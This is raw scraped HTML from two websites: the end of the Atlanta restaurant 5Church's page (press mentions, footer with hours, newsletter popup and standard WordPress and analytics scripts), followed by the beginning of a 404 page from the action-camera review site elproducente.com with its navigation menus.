src="http://5churchatlanta.com/wp-content/uploads/2017/09/zagat-5church-rooftop_page_1.jpg" alt="" width="816" height="1067" /></a> <a href="http://5churchatlanta.com/?attachment_id=1494" rel="attachment wp-att-1494"><img class="aligncenter size-full wp-image-1494" src="http://5churchatlanta.com/wp-content/uploads/2017/09/zagat-5church-rooftop_page_2.jpg" alt="" width="1700" height="2200" /></a> <br><p><a class="pixcode pixcode--btn btn featherlight-close" href="#">Close</a></p> </div> </li> <li class="press-mention"> <div class="quick-quote"> <i class="icon-5left-quote"></i> <p>The most anticipated Atlanta restaurant openings for 2016</p> </div> <a href="#" data-featherlight="#atlanta-magazine-window"> <img src="http://5churchatlanta.com/wp-content/uploads/2016/05/atlantamaglogo-2.jpg"> </a> <div id="atlanta-magazine-window" class="press-window"> <a href="http://staging.5churchatlanta.com/wp-content/uploads/2016/05/atl-mag.jpg" rel="attachment wp-att-1175"><img src="http://staging.5churchatlanta.com/wp-content/uploads/2016/05/atl-mag.jpg" alt="atl mag" width="2550" height="3300" class="aligncenter size-full wp-image-1175" /></a> <a href="http://staging.5churchatlanta.com/wp-content/uploads/2016/05/atl-mag-1.jpg" rel="attachment wp-att-1221"><img src="http://staging.5churchatlanta.com/wp-content/uploads/2016/05/atl-mag-1.jpg" alt="atl mag 1" width="2550" height="3300" class="aligncenter size-full wp-image-1221" /></a><a href="http://staging.5churchatlanta.com/wp-content/uploads/2016/05/atl-mag-2.jpg" rel="attachment wp-att-1222"><img src="http://staging.5churchatlanta.com/wp-content/uploads/2016/05/atl-mag-2.jpg" alt="atl mag 2" width="2550" height="3300" class="aligncenter size-full wp-image-1222" /></a><a href="http://staging.5churchatlanta.com/wp-content/uploads/2016/05/atl-mag-3.jpg" rel="attachment wp-att-1223"><img src="http://staging.5churchatlanta.com/wp-content/uploads/2016/05/atl-mag-3.jpg" alt="atl mag 3" width="2550" height="3300" class="aligncenter size-full wp-image-1223" /></a> <br><p><a class="pixcode pixcode--btn btn featherlight-close" href="#">Close</a></p> </div> </li> <li class="press-mention"> <div class="quick-quote"> <i class="icon-5left-quote"></i> <p>The Most Anticipated Atlanta Restaurant Openings of 2016</p> </div> <a href="#" data-featherlight="#zagat-window"> <img src="http://5churchatlanta.com/wp-content/uploads/2016/05/zagat-logo-2.jpg"> </a> <div id="zagat-window" class="press-window"> <a href="http://staging.5churchatlanta.com/wp-content/uploads/2016/05/zagat.jpg" rel="attachment wp-att-1178"><img src="http://staging.5churchatlanta.com/wp-content/uploads/2016/05/zagat.jpg" alt="Zagat" width="2550" height="3300" class="aligncenter size-full wp-image-1178" /></a> <br><p><a class="pixcode pixcode--btn btn featherlight-close" href="#">Close</a></p> </div> </li> <li class="press-mention"> <div class="quick-quote"> <i class="icon-5left-quote"></i> <p></p> </div> <a href="#" data-featherlight="#jezebel-2018-window"> <img src="http://5churchatlanta.com/wp-content/uploads/2018/04/best-of-atlanta-badge-1.png"> </a> </li> </ul> <a class="btn btn--small" href="http://5churchatlanta.com/home-mobile/frontpage/press/">View All</a> </section> </div> </section> </article> <footer class="site-footer "> <div class="copyright-area copyright-area__dark"> <div class="btn--top"> <a href="#" class="btn--top_text"> <span class="btn__arrow btn__arrow--top"></span> <span class="btn__arrow btn__arrow--bottom"></span> </a> </div> <div class="container-wider"> <div class="footer-block footer-block-location"><h3>Location</h3> <div class="textwidget"><p> 1197 Peachtree St NE,<br>Atlanta, GA 30361<br> <a class="plain" href="https://www.google.co.uk/maps/dir//5Church,+1197+Peachtree+St+NE,+Atlanta,+GA+30361/@33.7870109,-84.3850169,17z/data=!4m12!1m3!3m2!1s0x88f50444638e2bbd:0x7a4a386f98467978!2s5Church!4m7!1m0!1m5!1m1!1s0x88f50444638e2bbd:0x7a4a386f98467978!2m2!1d-84.3828282!2d33.7870109" target="_blank">Map</a> </p></div> </div> <div class="footer-block footer-block-contact"><h3>Contact</h3> <div class="textwidget"><p> 404-400-3669<br> <a class="uline" href="mailto:[email protected]">[email protected]<br> </a><a class="plain" href="http://staging.5churchatlanta.com//contact/">More</a> </p></div> </div> <div class="footer-block footer-block-follow"> <h3>Follow</h3> <ul class="nav nav--main nav--items-social"> <li> <a class="social-icon" href="https://www.facebook.com/5Church-Atlanta-1473784472918912/" target="_blank"> <i class="icon-5facebook"></i> </a> </li> <li> <a class="social-icon" href="http://twitter.com/5churchATL" target="_blank"> <i class="icon-5twitter"></i> </a> </li> <li> <a class="social-icon" href="http://instagram.com/5churchatlanta/" target="_blank"> <i class="icon-5instagram"></i> </a> </li> <li> <a class="social-icon" href="http://www.youtube.com/channel/UCUAnwO08L-PZ3fcyjNQplpg" target="_blank"> <i class="icon-5youtube"></i> </a> </li> </ul> <br> <a class="giftcard pixcode pixcode--btn btn btn--small" href="http://5churchatlanta.com/gift-cards/">Gift Cards</a> </div> <div class="footer-block footer-block-newsletter"> <h3>Newsletter</h3> <form id="mc-embedded-subscribe-form-footer" class="validate mailchimp-form " action="//howellskitchenbar.us17.list-manage.com/subscribe/post?u=918a232aa37a3c7fba3d06675&amp;id=21618a8477" method="post" name="mc-embedded-subscribe-form" target="_blank" novalidate="novalidate"> <input id="mce-EMAIL-footer" class="email footer-mce" type="email" name="EMAIL" placeholder="Email Address" value=""> <input id="mc-embedded-subscribe-footer" class="wpcf7-form-control wpcf7-submit footer-mce" type="submit" name="subscribe" value="Subscribe"> </form> </div> <div class="footer-block footer-block-hours"><h3>Hours</h3> <div class="textwidget"><p><strong>Dinner</strong><br>Monday: 5pm - 11pm<br> Tues - Wed: 5pm - 11pm<br>Thursday: 5pm - 12am<br>Friday: 5pm - 1am<br>Saturday: 5pm - 1am<br>Sunday: 5:30pm - 11pm</p> <p><strong>Lunch</strong><br>Mon - Fri: 11am-3pm</p> <p><strong>Social Hour:</strong><br> Mon - Thurs: 4:30pm - 6:30pm<br> <p><strong>Brunch</strong><br> Saturday: 11am - 3pm <br> Sunday: 11am - 4pm </p> <br /> Validated parking available Valet starts at 6pm</div> </div> </div> </div> <!-- .copyright-area --> </footer><!-- .site--footer --> <div class="covers"></div> </div><!-- #page --> <div id="pum-1924" class="pum pum-overlay pum-theme-1919 pum-theme-lightbox popmake-overlay auto_open click_open" data-popmake="{&quot;id&quot;:1924,&quot;slug&quot;:&quot;newsletter&quot;,&quot;theme_id&quot;:1919,&quot;cookies&quot;:[],&quot;triggers&quot;:[{&quot;type&quot;:&quot;auto_open&quot;,&quot;settings&quot;:{&quot;cookie_name&quot;:&quot;&quot;,&quot;delay&quot;:&quot;6500&quot;}},{&quot;type&quot;:&quot;click_open&quot;,&quot;settings&quot;:{&quot;extra_selectors&quot;:&quot;&quot;,&quot;cookie_name&quot;:null}}],&quot;mobile_disabled&quot;:null,&quot;tablet_disabled&quot;:true,&quot;meta&quot;:{&quot;display&quot;:{&quot;stackable&quot;:false,&quot;overlay_disabled&quot;:false,&quot;scrollable_content&quot;:false,&quot;disable_reposition&quot;:false,&quot;size&quot;:&quot;tiny&quot;,&quot;responsive_min_width&quot;:&quot;0%&quot;,&quot;responsive_min_width_unit&quot;:false,&quot;responsive_max_width&quot;:&quot;100%&quot;,&quot;responsive_max_width_unit&quot;:false,&quot;custom_width&quot;:&quot;640px&quot;,&quot;custom_width_unit&quot;:false,&quot;custom_height&quot;:&quot;380px&quot;,&quot;custom_height_unit&quot;:false,&quot;custom_height_auto&quot;:false,&quot;location&quot;:&quot;center&quot;,&quot;position_from_trigger&quot;:false,&quot;position_top&quot;:&quot;100&quot;,&quot;position_left&quot;:&quot;0&quot;,&quot;position_bottom&quot;:&quot;0&quot;,&quot;position_right&quot;:&quot;0&quot;,&quot;position_fixed&quot;:false,&quot;animation_type&quot;:&quot;fade&quot;,&quot;animation_speed&quot;:&quot;1000&quot;,&quot;animation_origin&quot;:&quot;center top&quot;,&quot;overlay_zindex&quot;:false,&quot;zindex&quot;:&quot;1999999999&quot;},&quot;close&quot;:{&quot;text&quot;:&quot;&quot;,&quot;button_delay&quot;:&quot;0&quot;,&quot;overlay_click&quot;:false,&quot;esc_press&quot;:false,&quot;f4_press&quot;:false},&quot;click_open&quot;:[]}}" role="dialog" aria-hidden="true" > <div id="popmake-1924" class="pum-container popmake theme-1919 pum-responsive pum-responsive-tiny responsive size-tiny"> <div class="pum-content popmake-content"> <h2 style="text-align: center;">Join Our Newsletter!</h2> <p style="text-align: center;"><script>(function() { if (!window.mc4wp) { window.mc4wp = { listeners: [], forms : { on: function (event, callback) { window.mc4wp.listeners.push({ event : event, callback: callback }); } } } } })(); </script><!-- MailChimp for WordPress v4.2.4 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-2" class="mc4wp-form mc4wp-form-1926" method="post" data-id="1926" data-name="Newsletter" ><div class="mc4wp-form-fields"><p> <label>Email address: </label> <input type="email" name="EMAIL" placeholder="Your email address" required /> </p> <p> <input type="submit" value="Sign up" /> </p></div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1558019420" /><input type="hidden" name="_mc4wp_form_id" value="1926" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-2" /><div class="mc4wp-response"></div></form><!-- / MailChimp for WordPress Plugin --></p> </div> <button type="button" class="pum-close popmake-close" aria-label="Close"> × </button> </div> </div> <script>(function() {function addEventListener(element,event,handler) { if(element.addEventListener) { element.addEventListener(event,handler, false); } else if(element.attachEvent){ element.attachEvent('on'+event,handler); } }function maybePrefixUrlField() { if(this.value.trim() !== '' && this.value.indexOf('http') !== 0) { this.value = "http://" + this.value; } } var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]'); if( urlFields && urlFields.length > 0 ) { for( var j=0; j < urlFields.length; j++ ) { addEventListener(urlFields[j],'blur',maybePrefixUrlField); } }/* test if browser supports date fields */ var testInput = document.createElement('input'); testInput.setAttribute('type', 'date'); if( testInput.type !== 'date') { /* add placeholder & pattern to all date fields */ var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]'); for(var i=0; i<dateFields.length; i++) { if(!dateFields[i].placeholder) { dateFields[i].placeholder = 'YYYY-MM-DD'; } if(!dateFields[i].pattern) { dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])'; } } } })();</script><script type='text/javascript' src='http://5churchatlanta.com/wp-content/themes/rosa/assets/js/plugins.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var ajaxurl = "http:\/\/5churchatlanta.com\/wp-admin\/admin-ajax.php"; var objectl10n = {"tPrev":"Previous (Left arrow key)","tNext":"Next (Right arrow key)","tCounter":"of","infscrLoadingText":"","infscrReachedEnd":""}; var theme_name = "rosa"; /* ]]> */ </script> <script type='text/javascript' src='http://5churchatlanta.com/wp-content/themes/rosa/assets/js/main.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"http:\/\/5churchatlanta.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}}; /* ]]> */ </script> <script type='text/javascript' src='http://5churchatlanta.com/wp-content/plugins/contact-form-7/includes/js/scripts.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var locals = {"ajax_url":"http:\/\/5churchatlanta.com\/wp-admin\/admin-ajax.php","ajax_nounce":"991de7f96d","load_likes_with_ajax":"","already_voted_msg":"You already voted!","like_on_action":"click","hover_time":"1000","free_votes":""}; /* ]]> */ </script> <script type='text/javascript' src='http://5churchatlanta.com/wp-content/plugins/pixlikes/js/public.js'></script> <script type='text/javascript' src='http://5churchatlanta.com/wp-content/themes/rosa-child/scripts/theme.js'></script> <script type='text/javascript' src='http://5churchatlanta.com/wp-content/themes/rosa-child/scripts/jquery.cycle2.min.js'></script> <script type='text/javascript' src='http://5churchatlanta.com/wp-content/themes/rosa-child/scripts/jquery.cycle2.swipe.min.js'></script> <script type='text/javascript' src='http://5churchatlanta.com/wp-includes/js/jquery/ui/core.min.js'></script> <script type='text/javascript' src='http://5churchatlanta.com/wp-includes/js/jquery/ui/position.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var pum_vars = {"version":"1.7.30","ajaxurl":"http:\/\/5churchatlanta.com\/wp-admin\/admin-ajax.php","restapi":"http:\/\/5churchatlanta.com\/wp-json\/pum\/v1","rest_nonce":null,"default_theme":"1918","debug_mode":"","disable_tracking":"","home_url":"\/","message_position":"top","core_sub_forms_enabled":"1","popups":[]}; var ajaxurl = "http:\/\/5churchatlanta.com\/wp-admin\/admin-ajax.php"; var pum_debug_vars = {"debug_mode_enabled":"Popup Maker: Debug Mode Enabled","debug_started_at":"Debug started at:","debug_more_info":"For more information on how to use this information visit https:\/\/docs.wppopupmaker.com\/?utm_medium=js-debug-info&utm_campaign=ContextualHelp&utm_source=browser-console&utm_content=more-info","global_info":"Global Information","localized_vars":"Localized variables","popups_initializing":"Popups Initializing","popups_initialized":"Popups Initialized","single_popup_label":"Popup: #","theme_id":"Theme ID: ","label_method_call":"Method Call:","label_method_args":"Method Arguments:","label_popup_settings":"Settings","label_triggers":"Triggers","label_cookies":"Cookies","label_delay":"Delay:","label_conditions":"Conditions","label_cookie":"Cookie:","label_settings":"Settings:","label_selector":"Selector:","label_mobile_disabled":"Mobile Disabled:","label_tablet_disabled":"Tablet Disabled:","label_event":"Event: %s","triggers":{"click_open":"Click Open","auto_open":"Time Delay \/ Auto Open"},"cookies":{"on_popup_close":"On Popup Close","on_popup_open":"On Popup Open","pum_sub_form_success":"Subscription Form: Successful","pum_sub_form_already_subscribed":"Subscription Form: Already Subscribed","manual":"Manual JavaScript","cf7_form_success":"Contact Form 7 Success"}}; var pum_sub_vars = {"ajaxurl":"http:\/\/5churchatlanta.com\/wp-admin\/admin-ajax.php","message_position":"top"}; var pum_popups = {"pum-1924":{"disable_on_mobile":false,"disable_on_tablet":true,"custom_height_auto":false,"scrollable_content":false,"position_from_trigger":false,"position_fixed":false,"overlay_disabled":false,"stackable":false,"disable_reposition":false,"close_on_overlay_click":false,"close_on_esc_press":false,"close_on_f4_press":false,"disable_form_reopen":true,"disable_accessibility":false,"triggers":[{"type":"auto_open","settings":{"cookie_name":"","delay":"6500"}}],"theme_id":"1919","size":"tiny","responsive_min_width":"0%","responsive_max_width":"100%","custom_width":"640px","custom_height":"380px","animation_type":"fade","animation_speed":"1000","animation_origin":"center top","location":"center","position_top":"100","position_bottom":"0","position_left":"0","position_right":"0","zindex":"1999999999","close_button_delay":"0","cookies":[],"id":1924,"slug":"newsletter"}}; /* ]]> */ </script> <script type='text/javascript' src='http://5churchatlanta.com/wp-content/uploads/pum/pum-site-scripts.js?defer=&#038;generated=1542319267'></script> <script type='text/javascript' src='http://5churchatlanta.com/wp-content/plugins/popup-maker/assets/js/mobile-detect.min.js'></script> <script type='text/javascript' src='http://5churchatlanta.com/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript' src='http://5churchatlanta.com/wp-content/plugins/pixcodes/js/shortcodes/frontend_otreservations.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var mc4wp_forms_config = []; /* ]]> */ </script> <script type='text/javascript' src='http://5churchatlanta.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms-api.min.js'></script> <!--[if lte IE 9]> <script type='text/javascript' src='http://5churchatlanta.com/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js'></script> <![endif]--> <script type="text/javascript"> ;(function($){ })(jQuery); </script> <script src="//cdn.rawgit.com/noelboss/featherlight/1.3.2/release/featherlight.min.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> (function ($) { $(document).ready(function () { //Team group image hovers $('#jamie, #alejandro, #patrick, #ayman, #rj').on('hover', function () { $('.interactive').toggleClass('with-blurb'); }); $('#jamie').on('hover', function () { $('.group-photo').toggleClass('jamie'); $('#jamie-lynch-blurb').toggleClass('active'); }); $('#alejandro').on('hover', function () { $('.group-photo').toggleClass('alejandro'); $('#alejandro-torio-blurb').toggleClass('active'); }); $('#patrick').on('hover', function () { $('.group-photo').toggleClass('patrick'); $('#patrick-whalen-blurb').toggleClass('active'); }); $('#ayman').on('hover', function () { $('.group-photo').toggleClass('ayman'); $('#ayman-kamel-blurb').toggleClass('active'); }); $('#rj').on('hover', function () { $('.group-photo').toggleClass('rj'); $('#rj-cooper-blurb').toggleClass('active'); }); //press mention hovers $('.press-mention').on('hover', function () { $(this).toggleClass('active'); }); //smooth scrolling anchor links $(function () { $('a[href*=#]:not([href=#])').click(function () { if (location.pathname.replace(/^\//, '') == this.pathname.replace(/^\//, '') && location.hostname == this.hostname) { var target = $(this.hash); target = target.length ? target : $('[name=' + this.hash.slice(1) + ']'); if (target.length) { $('html,body').animate({ scrollTop: target.offset().top }, 1000); return false; } } }); }); }); })(jQuery); </script> <script> (function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r].l = 1 * new Date(); a = s.createElement(o), m = s.getElementsByTagName(o)[0]; a.async = 1; a.src = g; m.parentNode.insertBefore(a, m) })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga'); ga('create', 'UA-35420100-4', 'auto'); ga('send', 'pageview'); </script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" class=""> <head> <link type="text/css" media="all" href="http://elproducente.com/wp-content/cache/autoptimize/css/autoptimize_a31e62481729cb9d1b85bd18e8f87405.css" rel="stylesheet" /><title>Page not found - el Producente</title> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="robots" content="all, index, follow" /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="shortcut icon" href="http://elproducente.com/wp-content/uploads/Icon_16.png" /> <!-- For iPhone --> <link rel="apple-touch-icon-precomposed" href="http://elproducente.com/wp-content/uploads/Icon_57.png"> <!-- For iPhone 4 Retina display --> <link rel="apple-touch-icon-precomposed" sizes="114x114" href="http://elproducente.com/wp-content/uploads/Icon_114.png"> <!-- For iPad --> <link rel="apple-touch-icon-precomposed" sizes="72x72" href="http://elproducente.com/wp-content/uploads/Icon_72.png"> <link href="//fonts.googleapis.com/css?family=Montserrat:400,400italic,700,700italic&#038;subset=latin,greek-ext,cyrillic,latin-ext,greek,cyrillic-ext,vietnamese" rel="stylesheet" type="text/css" /> <link href="//fonts.googleapis.com/css?family=Open+Sans:400,400italic,700,700italic&#038;subset=latin,greek-ext,cyrillic,latin-ext,greek,cyrillic-ext,vietnamese" rel="stylesheet" type="text/css" /> <link href="//fonts.googleapis.com/css?family=Libre+Baskerville:400,400italic,700,700italic&#038;subset=latin,greek-ext,cyrillic,latin-ext,greek,cyrillic-ext,vietnamese" rel="stylesheet" type="text/css" /> <link rel="pingback" href="http://elproducente.com/xmlrpc.php" /> <!-- This site is optimized with the Yoast SEO plugin v3.6.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="robots" content="noindex,follow"/> <link rel="publisher" href="http://www.google.com/+elproducente"/> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="object" /> <meta property="og:title" content="Page not found - el Producente" /> <meta property="og:site_name" content="el Producente" /> <meta property="fb:admins" content="1012914036" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:title" content="Page not found - el Producente" /> <meta name="twitter:site" content="@elproducente" /> <!-- / Yoast SEO plugin. --> <link rel="alternate" type="application/rss+xml" title="el Producente &raquo; Feed" href="http://elproducente.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="el Producente &raquo; Comments Feed" href="http://elproducente.com/comments/feed/" /> <link rel='stylesheet' id='theme-options-css-css' href='http://elproducente.com?theme-options=css&#038;ver=1.6-1441370120' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var ts_ajax_vars = {"ajaxurl":"http:\/\/elproducente.com\/wp-admin\/admin-ajax.php","ajax_nonce":"c33b2ec00f"}; /* ]]> */ </script> <script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#product=ga'></script> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://elproducente.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://elproducente.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.3.19" /> <meta property="fb:pages" content="127159050662802" /> <!-- begin SI CAPTCHA Anti-Spam - login/register form style --> <!-- end SI CAPTCHA Anti-Spam - login/register form style --> <meta data-pso-pv="1.2.1" data-pso-pt="errorPage" data-pso-th="5ec605c660e76143a8d83a60fdf31a79"></head> <body class="error404 ts-responsive ts-partial-top-bar ts-full-top-bar ts-is-not-single ts-no-back-to-top ts-back-to-top-mobile ts-has-sticky-nav wall-to-wall ts-sidebar-beside-content no-bg-image woocommerce-plus-minus-buttons woocommerce-less-than-2dot3 ts-logo-centered ts-main-nav-standard has-footer-widgets cookies-not-set"> <div id="wrap"> <div class="wrap-inner"> <div id="top-wrap" class=""> <!-- Top --> <div id="top-container" class="top-default"> <div id="top" class="ts-top"> <!-- top-bar --> <div id="top-bar-wrap" class="three-part"><div id="top-bar" class="mimic-small container clearfix"> <div class="left-side side header-social-icons"><p class="social social-fa-icons"><a href="http://www.facebook.com/elproducente" class="icon-style" target="_blank"><i class="fa fa-facebook"></i></a><a href="http://www.twitter.com/elproducente" class="icon-style" target="_blank"><i class="fa fa-twitter"></i></a><a href="http://www.pinterest.com/elproducente" class="icon-style" target="_blank"><i class="fa fa-pinterest"></i></a><a href="http://www.google.com/+elproducente" class="icon-style" target="_blank"><i class="fa fa-google-plus"></i></a><a href="http://www.instagram.com/el.producente" class="icon-style" target="_blank"><i class="fa fa-instagram"></i></a><a href="http://www.youtube.com/elProducente" class="icon-style" target="_blank"><i class="fa fa-youtube"></i></a><a href="http://elproducente.tumblr.com" class="icon-style" target="_blank"><i class="fa fa-tumblr"></i></a></p></div> <div class="middle-area">Your Action Camera Resource - GoPro, Yi Camera, Xiaomi, SJCAM, EKEN, Sony,...</div> <div class="text-right right-side side"><div class="top-stuff-link-item ts-hover-menu-wrap"><div class="search-pocket"><form role="search" method="get" class="ts-searchform" action="http://elproducente.com/" > <label class="assistive-text">Search for:</label> <input type="text" placeholder="Search..." value="" name="s" /> <button type="submit" class="fa fa-search"></button> </form></div></div></div> </div></div> <!-- /top-bar --> <div id="logo-nav-wrap"> <div id="logo-tagline-wrap" class="container logo-tagline-wrap"> <div id="logo" class="main-logo text-center"> <div class="logo-image"><a href="http://elproducente.com" title="Your Action Camera Resource"><img src="http://elproducente.com/wp-content/uploads/header-stonehenge1.jpg" alt="el Producente" class="low-res-logo" /></a></div><p id="logo-tagline" class="mimic-smaller uppercase">Your Action Camera Resource: News, Reviews & Tutorials</p> </div> </div> <div id="nav" class="main-nav-wrap ts-main-nav-wrap container"> <div id="ts-main-nav-inner-wrap"> <div id="main-nav-mobile" class="mobile-nav"><a id="ts-top-mobile-menu" class="mobile-menu"><strong class="mobile-menu-icon"></strong><span class="mobile-menu-sep"></span>Menu</a></div> <div id="main-nav" class="main-nav normal"> <ul class="sf-menu clearfix"><li id="menu-item-39" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-39"><a href="http://elproducente.com/"><span>BLOG / NEWS</span></a> <ul class="sub-menu"> <li id="menu-item-4023" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4023"><a href="http://elproducente.com/"><span>All News</span></a></li> <li id="menu-item-1159" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1159"><a href="http://elproducente.com/gopro/"><span>GoPro News</span></a></li> <li id="menu-item-1152" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1152"><a href="http://elproducente.com/xiaomi-yi/"><span>YI Camera News</span></a></li> <li id="menu-item-5818" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5818"><a href="http://elproducente.com/category/xiaomi/"><span>Xiaomi News</span></a></li> <li id="menu-item-1078" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1078"><a href="http://elproducente.com/sjcam/"><span>SJCAM News</span></a></li> </ul> </li> <li id="menu-item-95" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-95"><a href="http://elproducente.com/camera-reviews/"><span>Camera Reviews</span></a> <ul class="sub-menu"> <li id="menu-item-1968" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1968"><a href="http://elproducente.com/camera-reviews/"><span>All Camera Reviews</span></a></li> <li id="menu-item-2737" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2737"><a href="http://elproducente.com/4k-action-cameras/"><span>real 4K Camera</span></a></li> <li id="menu-item-5904" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5904"><a href="http://elproducente.com/action-cameras-under-100-usd/"><span>Action Cameras under 100 $</span></a></li> <li id="menu-item-2738" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2738"><a href="http://elproducente.com/360-cameras/"><span>360° Camera Reviews</span></a></li> <li id="menu-item-3324" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-3324"><a href="http://elproducente.com/best-action-camera-2016-gopro-hero5-black-vs-yi-4k-vs-sj7/"><span>Camera Comparisons</span></a></li> </ul> </li> <li id="menu-item-7091" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7091"><a href="http://elproducente.com/drones/"><span>Drones</span></a></li> <li id="menu-item-65" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-65"><a href="http://elproducente.com/accessories/"><span>Accessory Reviews</span></a> <ul class="sub-menu"> <li id="menu-item-1198" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1198"><a href="http://elproducente.com/action-camera-gimbal-stabilizer/"><span>Gimbals / Stabilizer</span></a></li> <li id="menu-item-4609" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4609"><a href="http://elproducente.com/drones/"><span>Drones</span></a></li> <li id="menu-item-5905" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5905"><a href="http://elproducente.com/accessories/"><span>General Accessories</span></a></li> <li id="menu-item-1201" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1201"><a href="http://elproducente.com/gopro-accessories/"><span>GoPro Accessories</span></a></li> <li id="menu-item-1193" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1193"><a href="http://elproducente.com/xiaomi-yi-accessories/"><span>YI Camera Accessories</span></a></li> </ul> </li> <li id="menu-item-1967" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1967"><a href="http://elproducente.com/tutorials/"><span>Tutorials</span></a> <ul class="sub-menu"> <li id="menu-item-2623" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2623"><a href="http://elproducente.com/giveaway-win-action-cameras-accessories/"><span>Giveaways</span></a></li> </ul> </li> <li id="menu-item-6776" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6776"><a href="http://www.elproducente.com/travel"><span>Travel Gadgets</span></a></li> </ul> </div> </div> </div> </div> </div> </div> <!-- / #top --> </div> <!-- / #top-wrap --> <div id="title-bar-wrap" class="title-bar-layout-normal title-bar-page hidden" style=""> <div id="title-bar" class="container"> <div id="title-bar-text" class="container"> <div class="row"> <div class="span8"> <h1>Page not found</h1> </div> <div class="span4 breadcrumbs-wrap"> <div class="breadcrumbs small"><span typeof="v:Breadcrumb"><a rel="v:url" property="v:title" href="http://elproducente.com/">Home</a></span> <span class="delimiter">/</span> <span class="current">Error 404</span></div><!-- .breadcrumbs --> </div> </div> </div> </div> </div> <div id="main-container-wrap" class=""> <div id="main-container" class="container clearfix"> <div id="main" class="clearfix no-sidebar"> <div class="entries"> <div class="entry single-entry"> <div class="post"> <div class="container"> <div class="ts-row"> <div class="span6"> <p>It seems we can&rsquo;t find what you&rsquo;re looking for. Perhaps searching can help...</p> <p><form role="search" method="get" class="ts-searchform" action="http://elproducente.com/" > <label class="assistive-text">Search for:</label> <input type="text" placeholder="Search..." value="" name="s" /> <button type="submit" class="fa fa-search"></button> </form></p> </div> <div class="span6"> &nbsp; </div> </div> </div> <div class="divider-shortcode line" style="padding-top:30px;padding-bottom:30px;"><div class="divider " >&nbsp;</div></div> </div> <div class="mimic-post"> <div class="container"> <div class="ts-row"> <div class="span4"> <h3>Pages</h3> <ul><li class="page_item page-item-2093"><a href="http://elproducente.com/360-camera-comparison/">360° Camera Comparison</a></li> <li class="page_item page-item-2229"><a href="http://elproducente.com/360-cameras/">360° Cameras</a></li> <li class="page_item page-item-2274"><a href="http://elproducente.com/4k-action-cameras/">4K Action Cameras</a></li> <li class="page_item page-item-2081"><a href="http://elproducente.com/4k-camera-comparison/">4K Camera Comparison</a></li> <li class="page_item page-item-106"><a href="http://elproducente.com/about/">ABOUT</a></li> <li class="page_item page-item-62"><a href="http://elproducente.com/accessories/">ACCESSORIES</a></li> <li class="page_item page-item-1196"><a href="http://elproducente.com/action-camera-gimbal-stabilizer/">Action Camera Gimbal Stabilizer</a></li> <li class="page_item page-item-5900"><a href="http://elproducente.com/action-cameras-under-100-usd/">Action Cameras under 100 USD</a></li> <li class="page_item page-item-1584"><a href="http://elproducente.com/ad/">AD</a></li> <li class="page_item page-item-38"><a href="http://elproducente.com/">BLOG / NEWS</a></li> <li class="page_item page-item-947"><a href="http://elproducente.com/action-cameras-comparison/">Camera Comparison</a></li> <li class="page_item page-item-93"><a href="http://elproducente.com/camera-reviews/">CAMERA REVIEWS</a></li> <li class="page_item page-item-126"><a href="http://elproducente.com/contact/">CONTACT</a></li> <li class="page_item page-item-1170"><a 